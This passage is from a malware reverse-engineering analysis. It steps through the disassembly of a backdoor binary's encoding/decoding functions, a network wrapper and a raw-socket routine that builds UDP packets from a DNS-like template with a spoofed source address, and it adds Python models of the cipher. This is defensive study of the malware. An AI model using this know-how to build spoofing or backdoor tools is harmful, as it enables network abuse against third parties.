0xc(%ebp) corresponds to Data_In, so a pointer to the start of Data_In
is loaded into %esi. The movzbl instructions then use %ebx and %edx as
indexes within the Data_In buffer, the first loading %eax with the byte
indexed by %ebx, and the second loading %edx with the byte indexed by
%edx. The subl has the effect of subtracting the value of Data_In[%edx]
from Data_In[%ebx]. Keeping in mind %edx = %ebx - 1, this makes it look
like:
%eax = Data_In[%ebx] - Data_In[%ebx - 1]
This statement also explains the reason for the earlier %ebx
conditional of it being 0, for which the following would occur:
0x804a22c: movl 0xc(%ebp),%esi
0x804a22f: movzbl (%esi),%eax
This effectively just does:
%eax = Data_In[0]
Which eliminates the -1 indexing.
Whichever branch is taken, execution ends up at 0x804a232:
0x804a232: leal 0xffffffe9(%eax),%ecx
0x804a235: testl %ecx,%ecx
0x804a237: jnl 0x804a244
This subtracts 23 from %eax and puts the result into %ecx. This value is
then checked to be greater than or equal to 0. If not:
0x804a23c: addl $0x100,%ecx
0x804a242: js 0x804a23c
the above loop runs, adding 0x100 to %ecx until it is no longer
negative.
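Since %eax holds the difference of two bytes (or a single byte), the subtract-then-add-0x100 sequence amounts to a reduction modulo 256. A small check, with an illustrative function name:

```python
def normalise(eax):
    ecx = eax - 23        # leal 0xffffffe9(%eax),%ecx
    while ecx < 0:        # jnl skips the loop, js repeats it
        ecx += 0x100      # addl $0x100,%ecx
    return ecx


# a difference of two bytes lies between -255 and 255
same_as_mod = all(normalise(d) == (d - 23) % 256 for d in range(-255, 256))
print(same_as_mod)
```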
As soon as %ecx is known to be non-negative:
0x804a244: xorl %edx,%edx
0x804a246: cmpl %edi,%edx
0x804a248: jnl 0x804a25d
%edx will of course be 0 for this statement. %edi, however, will still
be equal to DataAmount. The statements above simply result in a jump to
0x804a25d if 0 is not less than DataAmount (i.e. if DataAmount <= 0).
A loop follows:
0x804a24c: movl 0x10(%ebp),%esi
0x804a24f: movb (%edx,%esi,1),%al
0x804a252: movl 0xfffffffc(%ebp),%esi
0x804a255: movb %al,(%edx,%esi,1)
0x804a258: incl %edx
0x804a259: cmpl %edi,%edx
0x804a25b: jl 0x804a24c
0x10(%ebp) is matched with the address of the start of the Data_Out
buffer. 0xfffffffc(%ebp) was setup earlier to point to the end of the
local stack frame, more specifically to a buffer believed to have been
setup to be the same size as DataAmount.
With this knowledge, the above loop can be seen to copy data one byte at
a time from Data_Out to this localised buffer. The total amount copied
will be DataAmount bytes (%edi).
Following this duplication of Data_Out:
0x804a25d: movl 0x10(%ebp),%esi
0x804a260: movb %cl,(%esi)
The outcome of these two lines will be to set the first byte of Data_Out
to the %ecx last modified at 0x804a23c (the one that was continually
incremented until it turned positive).
The following is the setup to the next loop:
0x804a262: movl $0x1,%edx
0x804a267: cmpl %edi,%edx
0x804a269: jnl 0x804a27e
Similar to the earlier loop, %edi is still = DataAmount, and %edx forms
a loop counter which is initialised to 1.
Now for the loop:
0x804a26c: movl 0xfffffffc(%ebp),%esi
0x804a26f: movb 0xffffffff(%edx,%esi,1),%al
0x804a273: movl 0x10(%ebp),%esi
0x804a276: movb %al,(%edx,%esi,1)
0x804a279: incl %edx
0x804a27a: cmpl %edi,%edx
0x804a27c: jl 0x804a26c
0xfffffffc(%ebp) is still the same pointer to a local buffer as it was
in the last loop. The loop is a byte copy routine that writes the saved
copy back into Data_Out one position later (local[%edx - 1] goes to
Data_Out[%edx]), which has the effect of shifting the contents of
Data_Out to the right by 1 byte.
Next up is a call:
0x804a27e: movl 0xfffffffc(%ebp),%esi
0x804a281: pushl %esi
0x804a282: pushl %ecx
0x804a283: pushl $0x80678bf
0x804a288: movl 0x10(%ebp),%esi
0x804a28b: pushl %esi
0x804a28c: call 0x804f808
0xfffffffc(%ebp) still points to the local buffer. %ecx is the same
byte as earlier, the one that all the operations were done upon.
0x80678bf:
(gdb) x/1s 0x80678bf
0x80678bf: "%c%s"
Function at 0x804f808 corresponds to an sprintf() which matches the
inputs given.
Continuing with the main loop:
0x804a294: decl %ebx
0x804a295: jns 0x804a214
As a reminder, %ebx started the loop at DataAmount - 1. According to the
above, it will finish after completing a round of %ebx = 0.
This is effectively the end of the function.
Disassembly Review:
It turns out this function is not as complex as expected. It is
actually quite simple. It seems to be a generic data obfuscation
function that will take a buffer of N bytes, and produce an obfuscated
buffer of N bytes.
The method is very simple, whereby the loop starts at the end of
Data_In, taking one byte at a time and subtracting the byte directly
before it. On top of this, what looks to be some arbitrary value of 23
is also subtracted from it. The result of these subtractions forms the
last byte of the Data_Out buffer. The loop cycles through doing this
for the entire buffer, obviously leaving out the subtraction of the
'previous' byte when it reaches the start of Data_In.
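The behaviour described in this review can be modelled as follows. This is a sketch, not a translation of the binary: it works on Python bytes, it treats the sprintf() "%c%s" call as repeating the prepend that the manual shift already performed, and it ignores any effect NUL bytes might have on that sprintf(). The function name is illustrative.

```python
def data_manipulation_a(data_in):
    """Model of the main loop at 0x804a214."""
    n = len(data_in)
    data_out = bytearray(n)
    for i in range(n - 1, -1, -1):                 # %ebx: DataAmount - 1 down to 0
        value = data_in[i] - (data_in[i - 1] if i else 0)
        value = (value - 23) % 256                 # subtract 23, wrap into one byte
        data_out[1:] = data_out[:-1]               # shift existing output right by one
        data_out[0] = value                        # new byte goes to the front
    return bytes(data_out)


print(list(data_manipulation_a(bytes([24, 50]))))
```

Because each result is pushed onto the front while the index walks backwards, byte i of the output ends up derived from bytes i and i - 1 of the input.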
Function Overview:
An obvious encoder/decoder. This functionality was already assumed from
the ways this function and Data_Manipulation_Function_B were used
throughout the rest of the code.
The way that this function looks to be called on packets recv()'d, and
Data_Manipulation_Function_B looks to be called just before functions
that look to send (yet to be absolutely certain), suggests that
Data_Manipulation_Function_A is more than likely a decoder function,
and Data_Manipulation_Function_B will probably be an encoder function.
b) Data_Manipulation_Function_B [0x804a194] - (Memory Manipulation)
Known Usage:
function(number, Buffer1, Buffer2)
Guesses at purpose:
After the analysis of Data_Manipulation_Function_A, the purpose of
Data_Manipulation_Function_B doesn't take too much imagination to come
up with. It is more than likely an encoder function for a buffer of
data.
Naming Conventions:
Parameters will be given the following names:
function(DataAmount, Data_In, Data_Out)
Disassembly:
One of the first functional things to occur:
0x804a19a: movl 0x8(%ebp),%edi
0x804a19d: movl 0xc(%ebp),%esi
0x804a1a0: movl 0x10(%ebp),%ebx
0x804a1a3: movb 0x80675e5,%al
0x804a1a9: movb %al,(%ebx)
To put references on everything, 0x8(%ebp) would be DataAmount,
0xc(%ebp) corresponds to a pointer to Data_In buffer, and 0x10(%ebp)
will be a pointer to Data_Out buffer. The next two lines simply seem
to set the first byte of the Data_Out buffer to 0 (albeit a strange way
of doing it).
We then start setting up for a call:
0x804a1ab: movb (%esi),%al
0x804a1ad: addb $0x17,%al
0x804a1af: movsbl %al,%eax
0x804a1b2: pushl %eax
0x804a1b3: pushl $0x80678bc
0x804a1b8: pushl %ebx
0x804a1b9: call 0x804f808
(gdb) x/1s 0x80678bc
0x80678bc: "%c"
The 0x804f808 call corresponds to a sprintf() call. Obviously the
format string is for a single character, the destination is Data_Out.
The character will consist of the first byte from Data_In, plus 0x17.
This appears to be a setup to a loop:
0x804a1be: movl $0x1,%ecx
0x804a1c3: cmpl %edi,%ecx
0x804a1c5: je 0x804a1dd
Initialising %ecx to 1 and checking whether it equals DataAmount. If it
doesn't, it continues:
0x804a1c8: movzbl 0xffffffff(%ebx,%ecx,1),%edx
0x804a1cd: movzbl (%ecx,%esi,1),%eax
0x804a1d1: leal 0x17(%edx,%eax,1),%eax
0x804a1d5: movb %al,(%ecx,%ebx,1)
0x804a1d8: incl %ecx
0x804a1d9: cmpl %edi,%ecx
0x804a1db: jne 0x804a1c8
Remembering that %ebx points to Data_Out, one will see that the first
statement loads %edx with an indexed value from Data_Out, corresponding
to (%ecx - 1). %esi points to Data_In, as such, the second statement
loads up an indexed byte from Data_In, corresponding to %ecx.
The leal sees to the addition of the byte from Data_In, the byte from
Data_Out, and a value of 0x17. This value is then moved into the
corresponding %ecx index in Data_Out. %ecx is incremented and the
process starts over again using the next index along.
This continues until it reaches the end of the buffer (indicated by %ecx
meeting up with DataAmount), at which time the function is over, and it
returns.
Disassembly Review:
A much simpler case than in Data_Manipulation_Function_A. The
mirrored processing of Data_Manipulation_Function_A and
Data_Manipulation_Function_B is obvious. This function simply forms a
loop utilising a byte from Data_In, the previously encoded byte, and an
arbitrary value of 23. These are added together and only the low-order
byte of the sum is kept (which is the same as a modulus of 0x100) to
form the next encoded byte. The encoded bytes are stacked up in Data_Out.
Function Overview:
Once again, quite obviously an encoder/decoder. What becomes apparent
from the combined analysis of these two functions is that there is no
'encoder' and 'decoder'. Either function will encode a buffer, and the
other function will decode it. In searching Google, several references
to modulus-based ciphers describe similar methods of encoding data, but
an exact reference to either pseudocode or actual program code to do
what is done here could not be found.
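That the two functions undo each other, in either order, can be checked with a compact model of each. The formulas are taken from the two disassembly reviews; the Python names function_a and function_b are placeholders, and the sketch ignores the sprintf() details of the real code.

```python
def function_a(data):
    """out[i] = in[i] - in[i-1] - 23 (mod 256), with in[-1] taken as 0."""
    return bytes((b - (data[i - 1] if i else 0) - 23) % 256
                 for i, b in enumerate(data))


def function_b(data):
    """out[i] = in[i] + out[i-1] + 23 (mod 256), with out[-1] taken as 0."""
    out = bytearray()
    for b in data:
        out.append((b + (out[-1] if out else 0) + 23) % 256)
    return bytes(out)


message = b"any bytes at all"
print(function_a(function_b(message)) == message)
print(function_b(function_a(message)) == message)
```

Both comparisons hold for any input, since each step of one function cancels the corresponding step of the other modulo 256.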
c) Network_Function_A [0x8048ecc] - (Network)
Known Usage:
function(Buffer1, Buffer2, number)
Guesses at purpose:
This function is believed to be a communications function to send data
to the blackhat. The reason behind this belief is that just before this
function was called, Data_Manipulation_Function_B was called.
Data_Manipulation_Function_B is believed to be used as an encoding
function. The only reason to call such an encoding function before
sending network traffic is if it is part of the communications channel
to the blackhat.
Naming Conventions:
Parameters will be given the following names:
function(Buffer1, EncodedBuffer, DataAmount)
Disassembly:
Starting off:
0x8048ed2: movl 0x8(%ebp),%eax
0x8048ed5: movl 0x10(%ebp),%edi
0x8048ed8: cmpl $0x0,0x807e784
0x8048edf: je 0x8048f10
0x8(%ebp) corresponds to Buffer1. 0x10(%ebp) corresponds to DataAmount.
0x807e784 was earlier named Global_B.
Global_B was set by the second case section in the "Core Functionality".
If Global_B is NOT 0:
We commence a loop, starting with:
0x8048ee1: movl %eax,%ebx
0x8048ee3: leal 0x24(%ebx),%esi
0x8048ee6: leal (%esi),%esi
0x8048ee8: pushl $0xfa0
0x8048eed: call 0x80555b0
The code at 0x80555b0 is believed to be usleep() code. 0xfa0 would be
a 4000 microsecond sleep. Following this:
0x8048ef2: pushl %edi
0x8048ef3: movl 0xc(%ebp),%edx
0x8048ef6: pushl %edx
0x8048ef7: pushl %ebx
0x8048ef8: pushl $0x807e780
0x8048efd: call 0x8048f94
%edi will still be set to DataAmount. %edx will have been set to
EncodedBuffer. %ebx was earlier set to Buffer1. The contents of
0x807e780 appear to initially consist of all 0's. The analysis in the
"Core Functionality" section has shown that a particular packet using
the binary's communication channel can be used to set the first four
bytes of this buffer to the destination IP of an incoming packet
(expected to be the machine running the binary).
The call to 0x8048f94 has not yet been identified. It was earlier
followed and revealed to contain network functionality (thus why this
function was believed to be a network related function). This extra
function will now be named Network_Function_F and will be analysed
later.
The end of the looping structure:
0x8048f05: addl $0x4,%ebx
0x8048f08: cmpl %esi,%ebx
0x8048f0a: jle 0x8048ee8
As can be seen, %ebx is incremented by 4. %esi was earlier set to 36
bytes on top of Buffer1. %ebx starts at the beginning of Buffer1,
therefore the jle would result in the loop being repeated 10 times.
If Global_B IS 0:
We have a similar setup to just one iteration of the above loop:
0x8048f10: pushl %edi
0x8048f11: movl 0xc(%ebp),%edx
0x8048f14: pushl %edx
0x8048f15: pushl %eax
0x8048f16: pushl $0x807e780
0x8048f1b: call 0x8048f94
The setup is identical to what we just saw in the above loop. It
appears that if Global_B is 0, Network_Function_F is called with the
second parameter (push %eax) being set to the start of Buffer1.
No matter what Global_B is, the function now returns.
Disassembly Review:
The whole function hinges on Global_B. If Global_B is 0, it seems to
call Network_Function_F with a pointer to the beginning of Buffer1. If
Global_B is non-zero, a loop is constructed to call Network_Function_F
10 times, each time passing identical arguments, except for a pointer
that starts at the beginning of Buffer1, and is incremented by 4 bytes
for each iteration of the loop.
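The branching just described can be sketched as below. Pointers are modelled as plain integers, Network_Function_F is passed in as a callable because it has not been analysed yet, and the 4000 microsecond usleep() before each call in the loop is only noted in a comment. All Python names are illustrative.

```python
def network_function_a(buffer1, encoded_buffer, data_amount, global_b,
                       network_function_f):
    """Model of the function at 0x8048ecc."""
    fixed = 0x807e780                          # pushed first for every call
    if global_b != 0:
        # %ebx runs from Buffer1 to Buffer1 + 0x24 inclusive, in steps of 4
        for pointer in range(buffer1, buffer1 + 0x24 + 1, 4):
            # the binary calls usleep(0xfa0) here before each call
            network_function_f(fixed, pointer, encoded_buffer, data_amount)
    else:
        network_function_f(fixed, buffer1, encoded_buffer, data_amount)


calls = []
network_function_a(0x1000, b"enc", 3, 1, lambda *args: calls.append(args))
print(len(calls), hex(calls[0][1]), hex(calls[-1][1]))
```

With a non-zero Global_B the recorder sees ten calls, the second argument stepping through ten 4 byte slots, which matches the 40 byte size suggested for Buffer1.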
Function Overview:
This function appears to be some kind of wrapper to Network_Function_F.
All it seems to do is determine whether Network_Function_F is called 1
time or 10 times, all based upon Global_B. The only way to work out
what is actually going on and why this has any significance is to work
out what purpose Buffer1 plays for Network_Function_F. Buffer1's data
seems static for the duration of the binary's execution, except when the
blackhat manages to call case section 2 from the "Core Functionality"
of the binary, in which case they have the ability to set the contents
of this buffer of up to 40 bytes.
d) Network_Function_B [0x8049174] - (Network)
Known Usage:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), 0, *0xfffff006(%ebp),
*0xfffff007(%ebp), *0xfffff008(%ebp), 0xffffbb44(%ebp))
Guesses at purpose:
No idea.
Naming Conventions:
Parameters will be given the following names:
function(LongA, LongB, LongC, LongD, NumberA, LongE, LongF, LongG,
Buffer1)
Disassembly:
Start off by loading some parameters into local variables:
0x8049180: movb 0x8(%ebp),%bl
0x8049183: movb %bl,0xfffff9bc(%ebp)
0x8049189: movb 0xc(%ebp),%bl
0x804918c: movb %bl,0xfffff9b8(%ebp)
0x8049192: movb 0x10(%ebp),%bl
0x8049195: movb %bl,0xfffff9b4(%ebp)
0x804919b: movb 0x14(%ebp),%bl
0x804919e: movb %bl,0xfffff9b0(%ebp)
Doesn't really help any, so, continuing:
0x80491a4: leal 0xffffffdc(%ebp),%edi
0x80491a7: movl $0x8067698,%esi
0x80491ac: cld
0x80491ad: movl $0x9,%ecx
0x80491b2: repz movsl %ds:(%esi),%es:(%edi)
Looking at the loop, it becomes apparent that it takes a starting
position at 0x8067698 and copies 9 longs' worth of data to the local
stack address of 0xffffffdc(%ebp). The data:
(gdb) x/36b 0x8067698
0x8067698: 0x15 0x00 0x00 0x00 0x15 0x00 0x00 0x00
0x80676a0: 0x14 0x00 0x00 0x00 0x15 0x00 0x00 0x00
0x80676a8: 0x15 0x00 0x00 0x00 0x19 0x00 0x00 0x00
0x80676b0: 0x14 0x00 0x00 0x00 0x14 0x00 0x00 0x00
0x80676b8: 0x14 0x00 0x00 0x00
Obviously forming a buffer of: 21,21,20,21,21,25,20,20,20.
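The same conversion can be done mechanically by reading the 36 dumped bytes as nine little endian 32 bit values:

```python
import struct

raw = bytes([
    0x15, 0x00, 0x00, 0x00, 0x15, 0x00, 0x00, 0x00,
    0x14, 0x00, 0x00, 0x00, 0x15, 0x00, 0x00, 0x00,
    0x15, 0x00, 0x00, 0x00, 0x19, 0x00, 0x00, 0x00,
    0x14, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00,
    0x14, 0x00, 0x00, 0x00,
])

values = struct.unpack("<9I", raw)   # "<" = little endian, "9I" = nine 32 bit unsigned
print(values)                        # (21, 21, 20, 21, 21, 25, 20, 20, 20)
```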
More setup:
0x80491b4: movl $0x1,0xfffff9ac(%ebp)
0x80491be: leal 0xfffffde8(%ebp),%edi
0x80491c4: movl $0x80676bc,%esi
0x80491c9: cld
0x80491ca: movl $0x7d,%ecx
0x80491cf: repz movsl %ds:(%esi),%es:(%edi)
0xfffff9ac(%ebp) is unknown, but is set to 1. A loop is constructed to
copy 0x7d longs from 0x80676bc to a local buffer starting at
0xfffffde8(%ebp). The data:
(gdb) x/500 0x80676bc
0x80676bc: 0x47 0x6e 0x01 0x00 0x00 0x01 0x00 0x00
0x80676c4: 0x00 0x00 0x00 0x00 0x03 0x63 0x6f 0x6d
0x80676cc: 0x00 0x00 0x06 0x00 0x01 0x00 0x00 0x00
0x80676d4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x80676dc: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x80676e4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
[...]
The full dump has not been produced above.
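As a hypothesis only, and not something established at this point in the analysis, the first 21 bytes of the dump can be read as a DNS query: a 12 byte header, one length-prefixed label, a terminating zero, then a type and class. The sketch below decodes just the bytes shown above under that assumption. The field names follow the usual DNS header layout, and nothing is assumed about the elided remainder of the buffer.

```python
import struct

head = bytes([
    0x47, 0x6e, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x03, 0x63, 0x6f, 0x6d,
    0x00, 0x00, 0x06, 0x00, 0x01,
])

# 12 byte header: six big endian 16 bit fields
ident, flags, qdcount, ancount, nscount, arcount = struct.unpack(">6H", head[:12])

label_len = head[12]                              # length prefix of the first label
label = head[13:13 + label_len].decode("ascii")
after_name = 13 + label_len + 1                   # skip the terminating zero byte
qtype, qclass = struct.unpack(">2H", head[after_name:after_name + 4])

print(hex(ident), hex(flags), qdcount, label, qtype, qclass)
```

If this reading is right, the template would be a single-question query for the name "com" with type 6 and class 1, but that should be confirmed against how the buffer is actually used.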
More variable setup occurs, followed by:
0x8049201: cmpl $0x0,0x18(%ebp)
0x8049205: je 0x804920a
0x18(%ebp) would correspond to the NumberA parameter of the function.
The effect of the conditional appears to simply jump over the following:
0x8049207: decl 0x18(%ebp)
The outcome is that if NumberA != 0 then NumberA is decremented.
A call is then setup:
0x804920a: pushl $0xff
0x804920f: pushl $0x3
0x8049211: pushl $0x2
0x8049213: call 0x8056cf4
This is a socket() call which would look like:
socket(AF_INET, SOCK_RAW, IPPROTO_RAW)
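The mapping from the pushed constants to symbolic names can be cross-checked against the values exposed by Python's socket module on a Linux host (values on other platforms are not assumed here):

```python
import socket

# pushed in reverse order: 0xff (protocol), 0x3 (type), 0x2 (domain)
domain, sock_type, protocol = 0x2, 0x3, 0xff

print(domain == socket.AF_INET,
      sock_type == socket.SOCK_RAW,
      protocol == socket.IPPROTO_RAW)
```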
Checking the result:
0x8049218: movl %eax,0xfffff9a8(%ebp)
0x804921e: addl $0xc,%esp
0x8049221: testl %eax,%eax
0x8049223: jle 0x8049548
Socket number is moved into 0xfffff9a8(%ebp). If the result indicates an
error (<= 0), execution jumps to 0x8049548. If it is successful
(> 0) then it continues:
0x8049229: movl $0x0,0xfffff99c(%ebp)
0x8049233: movl $0x0,0xfffff998(%ebp)
0x804923d: pushl $0x400
0x8049242: pushl $0x0
0x8049244: pushl %esi
0x8049245: call 0x8057764
%esi was earlier set:
0x80491d1: leal 0xfffff9c8(%ebp),%esi
The call to 0x8057764 was earlier believed to be a memset(). This fits
into this situation and would look like:
memset(0xfffff9c8(%ebp), 0, 0x400)
This makes something from earlier stand out:
0x80491d7: leal 0xfffff9dc(%ebp),%ebx
0x80491e3: leal 0xfffff9e4(%ebp),%ebx
Effectively setting up two variables to point to within the same buffer
(it would be strange to memset across multiple buffers). A quick look
at the differences between them soon produces suspicions of future uses:
0xfffff9c8(%ebp) = X
0xfffff9dc(%ebp) = X + 20
0xfffff9e4(%ebp) = X + 20 + 8
Keeping in mind that an IP header (without options) is 20 bytes and a
UDP header is 8, these numbers should definitely arouse suspicion.
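The offsets are simple to confirm from the three displacements. The constant names below are illustrative; the header sizes are the standard minimum IPv4 and UDP header lengths.

```python
base = 0xfffff9c8     # memset() target, called X above
ptr_1 = 0xfffff9dc    # first pointer loaded into %ebx
ptr_2 = 0xfffff9e4    # second pointer loaded into %ebx

IP_HEADER_LEN = 20    # IPv4 header without options
UDP_HEADER_LEN = 8

print(ptr_1 - base, ptr_2 - ptr_1)   # 20 8
```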
Back to the code:
0x8049252: cmpl $0x0,0x24(%ebp)
0x8049256: je 0x80492b2
0x8049258: cmpl $0x0,0xfffff998(%ebp)
0x804925f: jg 0x80492b2
0x24(%ebp) will correspond to LongG. If it is 0, it will jump to
0x80492b2. 0xfffff998(%ebp) has been seen before, and was set to 0.
It is tested to be greater than 0, if so, it will jump to 0x80492b2.
Otherwise:
0x8049261: movl 0x28(%ebp),%ebx
0x8049264: pushl %ebx
0x8049265: call 0x804bf80
The call to 0x804bf80 is unknown, so a quick analysis is in order:
calls 0x804a9d8
calls 0x804f620 - fopen()
Looking at parameters passed to this function:
(gdb) x/1s 0x8067904
0x8067904: "/etc/host.conf"
(gdb) x/1s 0x8067913
0x8067913: "r"
Checking hosts lookup configuration (perhaps this is some kind of
dns function)
calls 0x804e180
calls 0x804d744
calls 0x804dfb4
calls 0x8057254
0x8057258: movl $0x4e,%eax
0x8057263: int $0x80
gettimeofday()
calls 0x8056e64 (does nothing system-wise)
calls 0x8057230
0x8057233: movl $0x14,%eax
0x8057238: int $0x80
getpid()
calls 0x8056e64 (already analysed)
calls 0x804e490
calls 0x804f620 - fopen()
(gdb) x/1s 0x8067d6b
0x8067d6b: "HOSTALIASES"
Definitely raises suspicion of host resolution function.
calls 0x804dfe0
calls 0x804d744
calls 0x804f620 - fopen()
(gdb) x/1s 0x8067c0f
0x8067c0f: "/etc/resolv.conf"
Most probably a gethostby* function.
calls 0x804b800
calls 0x804d02c (does nothing system-wise)
calls 0x804d6b8 (does nothing system-wise)
calls 0x804a5cc
calls 0x8056cf4 (socket())
The function analysis above is in no way complete (far from it). Random
checks of certain calls has resulted in what looks like a form of host
resolution function. At this stage it is unknown exactly what function
it is, however a look at the parameters passed to it show it to be
called as:
function(Buffer1)
A few assumptions were made and tested about this function, which in the
end looks to be:
struct hostent *gethostbyname(Buffer1)
The reasoning behind this identification is primarily the way the
result is used (will be looked at shortly). The function located at
0x804bf80 will be named gethostbyname for the rest of this analysis.
Result of this function is then tested:
0x804926a: movl %eax,%edx
0x804926c: addl $0x4,%esp
0x804926f: testl %edx,%edx
0x8049271: jne 0x8049288
If the return from gethostbyname() is 0 (fail):
The following is done:
0x8049273: pushl $0x258
0x8049278: call 0x80556cc
0x804927d: movl $0x1,%edi
0x8049282: addl $0x4,%esp
0x8049285: jmp 0x80492b2
The call matches up to a sleep(0x258). The movl sees to the setting
of %edi to 1. This was earlier set to 0. It is unknown what role
this plays as yet.
If the return from gethostbyname() is nonzero (successful):
Execution continues:
0x8049288: pushl $0x4
0x804928a: leal 0xfffff9c4(%ebp),%eax
0x8049290: pushl %eax
0x8049291: movl 0x10(%edx),%eax
0x8049294: movl (%eax),%eax
0x8049296: pushl %eax
0x8049297: call 0x8056480
0x8056480 is unidentified as a function, so we analyse it:
0x8056505: repz movsl %ds:(%esi),%es:(%edi)
It primarily consists of loops set up to copy data. %esi, %edi, and
%ecx are all based upon parameters to this function. It's done in such
a way that the above stack setup *should* result in 0x4 bytes from
*0x10(%edx) being copied to 0xfffff9c4(%ebp). Judging from its
position, the function is probably some compiler-placed one rather
than home-made (so to speak). It may be as simple as a memcpy or
bcopy, but since there is no *real* way to be sure, it will be named
as Misc_Data_Copy.
The reasoning behind believing the earlier function to be
gethostbyname() is the way a parameter is passed to Misc_Data_Copy.
More specifically, 0x10(%edx) is setup as being offset by +16 bytes
from %edx (which was earlier set to the return value from the
function). In looking at the hostent structure:
struct hostent {
__const
char *h_name; /* official name of host */
char **h_aliases; /* alias list */
int h_addrtype; /* host address type */
int h_length; /* length of address */
char **h_addr_list; /* list of addresses */
};
An offset of 0x10 (16) bytes would point to the start of h_addr_list. The
data copy above would effectively result in the copy of 4 bytes
(length of an IPv4 address) from this first address, to
0xfffff9c4(%ebp). This all fits in very well with the rest of this
function, so it is assumed to be correct.
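The offset argument can be checked with a small sketch. It assumes the
usual 32-bit x86 layout, where every pointer and int in the structure
is 4 bytes wide; the class name Hostent32 is made up for illustration
and the pointers are modelled as plain 32-bit integers.

```python
import ctypes

class Hostent32(ctypes.Structure):
    # Assumption: 32-bit target, so pointers and ints are all 4 bytes.
    _fields_ = [
        ("h_name", ctypes.c_uint32),       # char *
        ("h_aliases", ctypes.c_uint32),    # char **
        ("h_addrtype", ctypes.c_int32),    # int
        ("h_length", ctypes.c_int32),      # int
        ("h_addr_list", ctypes.c_uint32),  # char **
    ]

# Byte offset of every field from the start of the structure.
offsets = {name: getattr(Hostent32, name).offset
           for name, _ in Hostent32._fields_}

for name, offset in offsets.items():
    print("0x%02x  %s" % (offset, name))
```

Under that assumption h_addr_list sits at 0x10, which is the
displacement used in the movl 0x10(%edx),%eax instruction.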
The IP address seems to then be stored:
0x804929c: movl 0xfffff9c4(%ebp),%eax
0x80492a2: movl %eax,0xc(%esi)
0x80492a5: movl $0x9c40,0xfffff998(%ebp)
0xc(%esi) corresponds to 12 bytes after 0xfffff9c8(%ebp). Keeping in
mind earlier the suspicion that 0xfffff9c8(%ebp) is really a buffer to
construct a UDP packet, this all fits together with the IP address of
the host specified in Buffer1 being placed in the 'source address'
position of the buffer (bytes 13-16). The variable at 0xfffff998(%ebp)
was earlier set to 0, but its purpose is yet unknown.
With what looks to be the end of the conditionals, the following code
will always be executed:
0x80492b2: testl %edi,%edi
0x80492b4: jne 0x8049250
%edi is tested. It was initially set to a state of 0 and would remain
in that state unless the gethostbyname() function was called and had a
failure, in which case it would be 1.
The jump back to 0x8049250 will occur only if gethostbyname() was called
and failed. Otherwise:
0x80492b8: movl $0x0,0xfffff990(%ebp)
0x80492c2: leal (%esi),%esi
0x80492c4: cmpl $0x1,0xfffff9ac(%ebp)
0x80492cb: jne 0x80492e8
0xfffff990(%ebp) is set to 0. 0xfffff9ac(%ebp) was initially set to 1,
so the first iteration at least of this code will continue:
0x80492cd: movl $0x0,0xfffff9ac(%ebp)
0x80492d7: call 0x8055e38
The same variable is then set back to 0, and a call to 0x8055e38 takes
place. This call is short and to the point, but doesn't seem to do
anything!?! It does some arithmetic based upon some variables at
0x807895? and returns the result. When looking at the next few
statements one would assume it to be some kind of random() function,
but this has already been assumed to be at 0x8056058. The assumption
was not proven in any way and was more a guess based upon where it was
called. A quick disassembly of the code at 0x8056058 soon reveals
that it actually calls the code at 0x8055e38! This means the earlier
assumption is most probably incorrect and that 0x8055e38 is most
likely to be random(). Either way:
0x80492dc: movl $0x1f40,%ebx
0x80492e2: idivl %ebx,%eax
This results in %eax effectively being divided by 0x1f40. The result
utilised from this process is %edx (the remainder). The purpose of
this operation appears to be solely for the remainder, in a form of MOD
operation. This would make a lot of sense if the previous function
was indeed random().
If 0xfffff9ac(%ebp) is not 1 (perhaps on following iterations), %edx
is set to 0.
At this point, %edx was either set to a random number 0-7999 (0x1f40 is
8000), or 0, depending upon 0xfffff9ac(%ebp) (initially set so %edx is
random).
No matter what the last conditional worked out to be, it continues:
0x80492ea: cmpl $0x0,0x806d22c(,%edx,4)
0x80492f2: je 0x8049530
A long value at 0x806d22c with offset %edx is checked. If it is 0, it
jumps to 0x8049530, if not, we continue:
0x80492f8: leal 0x806d22c(,%edx,4),%edx
0x80492ff: movl %edx,0xfffff994(%ebp)
Once again, we use this offset by %edx, this time to put a memory
address into 0xfffff994(%ebp). We then use this address:
0x8049308: movl 0xfffff994(%ebp),%ebx
0x804930e: movl (%ebx),%eax
0x8049310: movl %eax,0xfffffddc(%ebp)
0x8049316: movl 0xfffff990(%ebp),%ebx
To extract the value from that memory location and put it into
0xfffffddc(%ebp). %ebx is then set to the value at 0xfffff990(%ebp)
0x804931c: leal 0xfffffde8(%ebp,%ebx,1),%edx
0x8049323: movl 0xffffffdc(%ebp,%edi,4),%eax
0x8049327: pushl %eax
0x8049328: pushl %edx
0x8049329: movl 0xfffff9a0(%ebp),%ebx
0x804932f: pushl %ebx
0x8049330: call 0x805652c
A function call to 0x805652c is setup and executed. The function is not
known, but in looking at the contents, a memory copy loop is formed such
that the above stack setup would result in *0xffffffdc(%ebp,%edi,4)
bytes being copied from 0xfffffde8(%ebp,%ebx,1) to 0xfffff9a0(%ebp).
Assuming %edi never exceeds 8, *0xffffffdc(%ebp,%edi,4) would always
point to one of the following values: 21,21,20,21,21,25,20,20,20 which
were placed into the buffer earlier.
0xfffffde8(%ebp,%ebx,1) follows an identical behaviour.
0xfffffde8(%ebp) was earlier setup as a 500 byte copy of preset data.
Using %ebx as an index, the amount of data specified is copied to a
memory location specified at 0xfffff9a0(%ebp). This was earlier set to:
0x80491e3: leal 0xfffff9e4(%ebp),%ebx
0x80491e9: movl %ebx,0xfffff9a0(%ebp)
A look back at suspicions about this whole section:
0xfffff9e4(%ebp) = X + 20 + 8
If this was indeed a setup for a UDP IP packet, this data copy would fit
in EXACTLY to form the data component of the packet.
More randomising code:
0x8049338: call 0x8055e38
0x804933d: movl $0xff,%ebx
0x8049342: cltd
0x8049343: idivl %ebx,%eax
%edx is now presumed to be a random number 0 to 0xfe. It's then stored:
0x8049345: movl 0xfffff9a0(%ebp),%ebx
0x804934b: movb %dl,(%ebx)
A byte of this remainder (always below 255) replaces the first byte
of this data component, and oddly enough, the process is repeated to see
the second byte also replaced:
0x8049360: movb %dl,0x1(%ebx)
